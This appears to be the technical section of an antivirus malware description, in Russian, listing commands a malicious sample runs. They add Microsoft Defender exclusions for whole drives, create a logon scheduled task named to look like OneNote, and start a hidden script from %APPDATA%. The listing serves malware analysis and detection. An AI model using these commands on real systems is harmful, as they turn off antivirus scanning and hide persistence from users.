Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionpath @('C:\','D:\','E:\','<Имя диска съемного носителя>:\', 'powershell.exe') -exclusionprocess powershell.exe
- %APPDATA%\strt.cmd
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionpath @('C:\','D:\','E:\','<Имя диска съемного носителя>:\', 'powershell.exe') -exclusionprocess powershell.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('<PATH_SAMPLE>')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Register-ScheduledTask -TaskName 'OneNote 62732' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute '%APPDATA%\strt.cmd') -Settings (New-ScheduledTaskSetting...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start "" "%APPDATA%\strt.cmd"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('<PATH_SAMPLE>')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Register-ScheduledTask -TaskName 'OneNote 62732' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute '%APPDATA%\strt.cmd') -Settings (New-ScheduledTaskSetting...
- '<SYSTEM32>\cmd.exe' /c start "" "%APPDATA%\strt.cmd"
- '<SYSTEM32>\cmd.exe' /K "%APPDATA%\strt.cmd"